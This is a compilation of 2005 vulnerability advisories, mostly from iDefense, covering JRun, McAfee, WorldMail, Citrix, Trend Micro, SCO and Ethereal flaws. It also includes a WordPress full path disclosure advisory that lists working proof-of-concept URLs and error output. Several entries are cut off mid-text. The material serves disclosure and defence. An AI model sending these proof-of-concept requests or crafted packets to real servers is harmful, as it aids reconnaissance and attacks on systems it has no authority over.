name CAN-2005-3660 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
11/17/2005 Initial vendor notification - Linux vendors
11/19/2005 Initial vendor responses
12/22/2005 Public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com
X. LEGAL NOTICES
Copyright © 2005 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
iDefense Security Advisory 12.21.05: Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability
Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability iDefense Security Advisory 12.21.05 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=360 December 21, 2005 I. BACKGROUND Macromedia JRun 4 is an application server used for developing and deploying Java based applications. More information can be found at the following URL: http://www.macromedia.com/software/jrun/ II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in Adobe Inc.'s JRun 4 may allow attackers to execute arbitrary code or cause a denial of service condition. The vulnerability exists within the JRun web server, specifically in the handling of long request strings. In certain configurations, when a long (approximately 64k) URL is supplied, a stack-based overflow occurs potentially allowing the execution of arbitrary code. In testing performed by iDefense Labs, it was possible to overwrite the saved return address on the stack with remotely supplied values (converted into 'wide characters' by the server). III. ANALYSIS Successful exploitation may allow remote attackers to execute arbitrary code with Local System privileges. The supplied JRun web server must be active for the attack vector to exist. It is not recommended to use the JRun web server component in production systems, as the installer mentions that it should be used for development only. As the service restarts after each crash, it is possible to make multiple attempts to exploit this issue, and each time restart from a 'clean' state. Although this vulnerability allows a stack overwrite, it may be more difficult to exploit due the input string being converted into a 'wide character' version of the str input, by placing a null byte between each character. While this does not necessarily prevent exploitation, it does increase the complexity of developing an exploit. Exploitation of this vulnerability may allow a remote attacker to execute code on the affected system as Local System, allowing complete compromise, or cause a denial of service against the affected system, preventing legitimate use. IV. DETECTION This vulnerability was confirmed by the vendor to affect the JRun 4 webserver server prior to the JRun 4 Updater 5 release in March of 2005. V. WORKAROUND The JRun documentation suggests that the JRun Web Server should not be used in a production environment. In a development environment, the JRun server should not accept connections from outside of the development network. VI. VENDOR RESPONSE Adobe has reported that this issue was resolved in the JRun 4 Updater 5 release in March 2005. The following security advisory was released on December 15, 2005: http://www.macromedia.com/devnet/security/security_zone/mpsb05-13.html VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 08/25/2004 Initial vendor notification 08/31/2004 Initial vendor response 12/21/2005 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
ECHO.OR.ID ECHO_ADV_24$2005 --- [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2 --- Author: Dedi Dwianto Date: Dec, 20th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv24-theday-2005.txt --- Affected software description: ~~ Application : JAF CMS version: < 1.5.2 URL : http://wordpress.org/ Description : WordPress is a very popular personal publishing platform aka blog software, and is used by everyone from celebrities, to government officials, to non technical average joe's. --- Vulnerabilities: A. Full path disclosure: A remote user can access the file directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul POC : http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul Fatal error: Call to undefined function: get_settings() in /var/www/html/blog/wp-includes/vars.php on line 106 * http://victim/[WP Folder]/wp-content/plugins/hello.php POC : http://localhost/blog/wp-content/plugins/hello.php Fatal error: Call to undefined function: wptexturize() in /var/www/html/blog/wp-content/plugins/hello.php on line 44 * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul POC : http://localhost/blog/wp-admin/menu-header.php?self=dudul PHP Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 * http://victim/[WP Folder]/wp-admin/upgrade-functions.php POC : http://localhost/[WP Folder]/wp-admin/upgrade-functions.php Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 * http://victim/[WP FOlder]/wp-admin/edit-form.php POC : http://localhost/blog/wp-admin/edit-form.php PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 * http://victim/[WP FOlder]/wp-settings.php POC : http://localhost/blog/wp-settings.php Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-settings.php on line 59 PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php POC : http://localhost/blog/wp-admin/edit-form-comment.php Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2 B. Fix For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error --- Shoutz: ~~~ ~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous ~ [EMAIL PROTECTED] ~ [EMAIL PROTECTED] --- Contact: the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ [ EOF ] --
iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite
McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite iDefense Security Advisory 12.20.05 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=358 December 20, 2005 I. BACKGROUND McAfee VirusScan is an anti-virus software. More information is available from the vendor website: http://www.mcafee.com/myapps/ II. DESCRIPTION Remote exploitation of an access control vulnerability in McAfee Security Center allows attackers to create or overwrite arbitrary files. The vulnerability specifically exists due to a registered ActiveX control failing to restrict which domains may load the control for execution. MCINSCTL.DLL as included with McAfee Security Center exports an object for logging called MCINSTALL.McLog. The McLog object is designed to allow Security Center to log to a file through the StartLog and AddLog methods. McAfee fails to restrict the ActiveX control from being loaded in arbitrary domains. As such, attackers can create a specially crafted web page utilizing the McLog object to create arbitrary files. This attack can lead to arbitrary code execution by a remote attacker. III. ANALYSIS Successful exploitation of this vulnerability allows attackers to create or append to arbitrary files. An attacker can write to a startup folder to execute arbitrary code during the next reboot or logon session. A user will not be required to authorize the object instantiation since the object is within a signed ActiveX control. A typical exploitation scenario would require an attacker to convince a targeted user to visit a malicious website. This vulnerability hints at a new class of vulnerabilities that occur due to developers not using the IObjectSafetySiteLock() API to restrict domains that can load a particular ActiveX control. Vendors who distributed third-party ActiveX controls should be sure to use the IObjectSafetySiteLock() API in their applications. IV. DETECTION McAfee Security Center is a component that is distributed with various McAfee products. The following products have been confirmed to contain a vulnerable mcinsctl.dll component in their distribution: • McAfee VirusScan (mcinsctl.dll 4.0.0.83) V. WORKAROUND iDefense is unaware of any effective workarounds at this time. VI. VENDOR RESPONSE "McAfee previously released updates to SecurityCenter that resolve this issue. All active McAfee SecurityCenter users, by default, should have automatically received the update, and will now have the fix for this vulnerability already installed on their computers. To manually check for updates, users can right-click the McAfee system tray icon (white M on red background) and select 'Updates'. In the resulting dialogue box, they should click 'Check Now' to check the server for updates. The user will be walked through the update process or be notified that all software is up to date. If a user has not yet registered, a registration web page or the registration wizard will pop-up, guiding the user through the update process. McAfee's key priority is the security of our customers. In the event that a vulnerability is found within any of McAfee's software, we have a strong process in place to work closely with the relevant security research group to ensure the rapid and effective development of a fix and communication plan." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3657 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/15/2005 Initial vendor notification 11/16/2005 Initial vendor response 12/20/2005 Coordinated public disclosure IX. CREDIT iDefense credits Peter Vreugdenhil with the discovery of this vulnerability. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability
Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability iDefense Security Advisory 12.20.05 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359 December 20, 2005 I. BACKGROUND Qualcomm WorldMail is an email and messaging server designed for use in small to large enterprises that supports IMAP, POP3, SMTP, and web mail features. More information can be found on the vendors site: http://www.eudora.com/worldmail/ II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in Qualcomm WorldMail IMAP Server allows unauthenticated attackers to execute arbitrary code. III. ANALYSIS Successful exploitation of this vulnerability allows attackers to execute arbitrary code with SYSTEM privileges. This leads to a total compromise of the mail server. In order to trigger this overflow, an attacker only needs to send a long string ending with a '}' character. This will result in a stack overflow and the attacker may use an SEH overwrite or a standard EBP or EIP overwrite in order to gain control of the process trivially. This is a pre-authentication vulnerability. To exploit this vulnerability an attacker would need to be able connect to the e-mail server and the IMAP module would have to be enabled (default). Only one command is required to trigger this vulnerability. IV. DETECTION This exploit was tested against Qualcomm Worldmail server version 3.0. Other versions may be vulnerable. V. WORKAROUND There is no workaround currently available except for disabling IMAP services. VI. VENDOR RESPONSE The vendor was contacted according to the timeline shown but a response has not yet been received. As this vulnerability has been publicly disclosed at an alternate location (http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html) we are proceeding with public disclosure. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-4267 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 12/20/2005 Coordinated public disclosure IX. CREDIT [EMAIL PROTECTED], an anonymous researcher and Nico are credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.16.05: Citrix Program Neighborhood Name Heap Corruption Vulnerability
Citrix Program Neighborhood Name Heap Corruption Vulnerability iDefense Security Advisory 12.16.05 www.idefense.com/application/poi/display?id=357&type=vulnerabilities December 16, 2005 I. BACKGROUND Citrix Program Neighborhood is the client used to connect to applications published on Citrix Metaframe servers. More information is available from the vendor website: http://www.citrix.com II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Citrix, Inc.'s Program Neighborhood allows attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient handling of corrupt Application Set responses. A heap-based buffer overflow will occur when the Citrix Program Neighborhood client receives an Application Set response containing a name value over 286 bytes. The overflow will trigger an access violation in RtlFreeHeap() with register control sufficient to write 4 bytes to an arbitrary location as shown below: 77F52A7B 8B4E 0C MOV ECX,DWORD PTR DS:[ESI+C] 77F52A7E 898D 60FF MOV DWORD PTR SS:[EBP-A0],ECX 77F52A84 8901 MOV DWORD PTR DS:[ECX],EAX Registers: EAX 41414141 ECX 4141 ESI 008D5E30 ASCII "AA" EIP 77F52A84 ntdll.77F52A84 Crash: 77F52A84 8901 MOV DWORD PTR DS:[ECX],EAX Remote attackers can send an specially crafted name value to overflow the buffer and execute arbitrary code. III. ANALYSIS Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code with user privileges. The overflow is a trivial heap-based buffer overflow due to insufficient bounds checking on the 'name' value in Application Set responses. A typical exploitation scenario would require an attacker to setup a fake Citrix Server and wait for a Citrix Program Neighborhood client to connect. Upon receiving the first connecting packets from the client, the server would send a corrupt UDP packet to the client. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Citrix Presentation Server Client 9.0. All prior versions are suspected vulnerable. V. WORKAROUND iDefense is unaware of any effective workarounds at this time. VI. VENDOR RESPONSE The vendor has released the following advisory to address this issue: http://support.citrix.com/kb/entry.jspa?externalID=CTX108354 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3652 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/15/2005 Initial vendor notification 11/15/2005 Initial vendor response 12/16/2005 Coordinated public disclosure IX. CREDIT iDefense credits Patrik Karlsson ([EMAIL PROTECTED]) with the discovery of this vulnerability. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability
Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability iDefense Security Advisory 12.14.05 www.idefense.com/application/poi/display?id=351&type=vulnerabilities December 14, 2005 I. BACKGROUND Trend Micro PC-Cillin Internet Security is antivirus protection software for home and business use. It provides complete protection, detection and elimination of thousands of computer viruses, worms, and Trojan Horse programs. II. DESCRIPTION Local exploitation of an insecure permission vulnerability in multiple Trend Micro Inc. products allows attackers to escalate privileges or disable protection. The vulnerabilities specifically exist in the default Access Control List (ACL) settings that are applied during installation. When an administrator installs an affected Trend Micro product, the default ACL allows any user to modify the installed files. Due to the fact that some of the programs run as system services, a user could replace an installed Trend Micro product file with their own malicious code, and the code would be executed with system privileges. III. ANALYSIS Successful exploitation allows local attackers to escalate privileges to the system level. It is also possible to use this vulnerability to simply disable protection by moving all of the executable files so that they cannot start upon a reboot. Once disabled, the products are no longer able to provide threat mitigation, thus opening the machine up to attack. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Trend Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is suspected that previous versions are also vulnerable. It has been reported that InterScan VirusWall, InterScan eManager and Office Scan are also vulnerable. V. WORKAROUND Apply proper Access Control List settings to the directory that the affected Trend Micro product is installed in. The ACL rules be set so that no regular users can modify files in the directory. VI. VENDOR RESPONSE "Trend Micro has become aware of a vulnerability related to PC-CILLIN 12. PC-cillin12 does not work correctly when configuration file and the registry are erased intentionally. We will release PC-cillin12.4 in December 14, 2005 by AU server. This release will be included short term solution of changing ACL to User authority for configuration file and registry. And We will create a tool for changing ACL to User authority for configuration file and registry. This tool can be used for both PC-cillin12 and PC-cillin14 as a same program." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3360 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/27/2005 Initial vendor notification 10/27/2005 Initial vendor response 12/14/2005 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.14.05: Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure
Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure
iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=352&type=vulnerabilities
December 14, 2005
I. BACKGROUND
Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, patter file
updates, notifications and remote installations. More information about
the product set is available at:
www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm
II. DESCRIPTION
Remote exploitation of an input validation vulnerability in Trend Micro
Inc.'s ServerProtect Management Console allows remote attackers to view
the contents of arbitrary files on the underlying system.
The problem specifically exists within the handling of the IMAGE
parameter in the script rptserver.asp. The vulnerable area of code is
outlined in the following snippet:
Set session("oEMF") = Server.CreateObject("CREmfgen.CREmfgen.2")
Call ParseQS()
if IMAGE <> "" then
Call session("oEMF").StreamImage(IMAGE, DEL)
Response.End
end if
An attacker can utilize directory traversal modifiers to traverse
outside the system temporary directory and access any file on the same
volume.
III. ANALYSIS
Successful exploitation of the described vulnerability allows remote
attackers to view the contents of arbitrary files on the underlying
system. Exploitation does not require credentials thereby exacerbating
the impact of this vulnerability.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.
V. WORKAROUND
Employ firewalls, access control lists or other TCP/UDP restriction
mechanism to limit access to the vulnerable system on the configured
port, generally TCP port 80.
VI. VENDOR RESPONSE
"Trend Micro has become aware of a vulnerability related to Crystal
Report, a reporting component found in Trend Micro Control Manager (v2.5
and v3.0). Under certain conditions, arbitrary files on the
ReportServer volume inside Trend Micro Control Manager software could be
viewed or accessed remotely. Trend Micro is currently consulting with
Crystal Report regarding permanent solutions to this reporting
component. A temporary workaround solution can be recommended through
contacting Trend Micro customer and technical support."
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1930 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
06/03/2005 Initial vendor notification
06/06/2005 Initial vendor response
12/14/2005 Public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp
Free tools, research and upcoming events
http://labs.iDefense.com
X. LEGAL NOTICES
Copyright © 2005 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
iDefense Security Advisory 12.14.05: Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability
Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability iDefense Security Advisory 12.14.05 www.idefense.com/application/poi/display?id=356&type=vulnerabilities December 14, 2005 I. BACKGROUND Trend Micro Inc.'s ServerProtect provides antivirus scanning with centralized management of virus outbreaks, scanning, patter file updates, notifications and remote installations. More information about the product set is available at: www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm II. DESCRIPTION Remote exploitation of a denial of service vulnerability in Trend Micro Inc.'s ServerProtect EarthAgent daemon allow attackers to cause the target process to consume 100% of available CPU resources. The problem specifically exists within ServerProtect EarthAgent in the handling of maliciously crafted packets transmitted with the magic value "\x21\x43\x65\x87" targeting TCP port 5005. A memory leak also occurs with each received exploit packet allowing an attacker to exhaust all available memory resources with repeated attack. III. ANALYSIS Successful exploitation of the described vulnerability allows unauthenticated remote attackers to consume 100% CPU resources, increasingly consume memory resources and potentially crash the underlying operating system. Full CPU utilization can be achieved with a single packet, memory consumption occurs incrementally on subsequent attacks. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Trend Micro ServerProtect for Windows Management Console 5.58 running with Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup Server 1.1. It is suspected that earlier versions and versions for other platforms are vulnerable as well. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to vulnerable systems on TCP port 5005. VI. VENDOR RESPONSE The vendor has released the following security advisory for this issue: http://kb.trendmicro.com/solutions/search/main/search/ solutionDetail.asp?solutionID=25254 "Contact Trend Micro Technical Support to request for the SPNT5.58_HotfixB1137.zip file, which should only be installed on servers running SPNT 5.58." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-1928 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/03/2005 Initial vendor notification 06/05/2005 Initial vendor response 12/14/2005 Public disclosure IX. CREDIT This vulnerability was discovered by Pedram Amini, OpenRCE (www.openrce.org). Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability
of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.14.05: Trend Micro ServerProtect isaNVWRequest.dll Chunked Overflow
granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability
SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability iDefense Security Advisory 12.12.05 www.iDefense.com/application/poi/display?id=350&type=vulnerabilities December 12, 2005 I. BACKGROUND SCO Unixware is a Unix operating system that runs on many OEM platforms. II. DESCRIPTION Local exploitation of a buffer overflow vulnerability in the uidadmin binary included in multiple versions of The SCO Group Inc.'s Unixware allows attackers to gain root privileges. The vulnerability specifically exists because of a failure to check the length of user specified file input. If the user prepares a file longer than 1,600 bytes and supplies the path to that file using the "-S" option of uidadmin, a stack based buffer overflow occurs. This leads to the execution of arbitrary code with root privileges, as uidadmin is setuid root by default. III. ANALYSIS Successful exploitation of this vulnerability requires that a user have local access to the system. This would allow the user to gain super user privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in SCO Unixware versions 7.1.3 and 7.1.4. All previous versions of SCO Unixware are suspected to be vulnerable. V. WORKAROUND Remove the setuid bit from the ppp binary: chmod u-s /unixware/usr/bin/uidadmin VI. VENDOR RESPONSE The vendor has released the following update to address this vulnerability: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.54 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3903 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/12/2005 Initial vendor notification 10/13/2005 Initial vendor response 12/12/2005 Coordinated public disclosure IX. CREDIT iDefense Labs is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.09.05: Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability iDefense Security Advisory 12.09.05 www.idefense.com/application/poi/display?id=349&type=vulnerabilities December 9, 2005 I. BACKGROUND Ethereal is a full featured open source network protocol analyzer. For more information, see http://www.ethereal.com/ II. DESCRIPTION Remote exploitation of an input validation vulnerability in the OSPF protocol dissectors within Ethereal, as included in various vendors operating system distributions, could allow attackers to crash the vulnerable process or potentially execute arbitrary code. The affected Ethereal component is used to analyse Open Shortest Path First (OSPF) Interior Gateway Protocol (IGP), as specified in RFC-2178. The vulnerability specifically exists due to no bounds checking being performed in the dissect_ospf_v3_address_prefix() function. This function takes user-supplied binary data and attempts to convert it into a human readable string. This function uses a fixed length buffer on the stack to store the constructed string but performs no checks on the length of the input. If the generated output length from the input exceeds the size of the buffer, a stack-based overflow occurs. III. ANALYSIS Successful exploitation allows remote attackers to perform a DoS against a running instance of Ethereal and may, under certain conditions, potentially allow the execution of arbitrary code. As the overflow string is generated from a format string converting binary values into their hexadecimal (base 16) equivalent characters, it can contain only a limited subset of all possible characters, and the length of an overflow is only able to be controlled to within the three characters. This may prevent exploit ability on some platforms; however, it may be possible that these constraints will not prevent exploitation on others. IV. DETECTION iDefense has confirmed the existence of this vulnerability in the ethereal-0.10.12 RPM from Red Hat Fedora Core 3. It is suspected that previous versions containing the OSPF dissector code are also vulnerable. V. WORKAROUND Disable the OSPF packet dissector in Ethereal by performing the following actions as the user invoking Ethereal, typically root. Create the .ethereal directory: # mkdir ~/.ethereal You can safely ignore the following error: mkdir: cannot create directory '/root/.ethereal': File exists Add the OSPF dissector to the list of protocols to ignore. # echo ospf >> ~/.ethereal/disabled_protos This workaround will prevent Ethereal from parsing the contents of OSPF packets, which prevents exposure to the vulnerability. VI. VENDOR RESPONSE A source patch is available from the main ethereal SVN Repository: http://anonsvn.ethereal.com/viewcvs/viewcvs.py/trunk/epan/dissectors/ packet-ospf.c?rev=16507&view=markup VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3651 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/14/2005 Initial vendor notification 11/14/2005 Initial vendor response 12/09/2005 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for 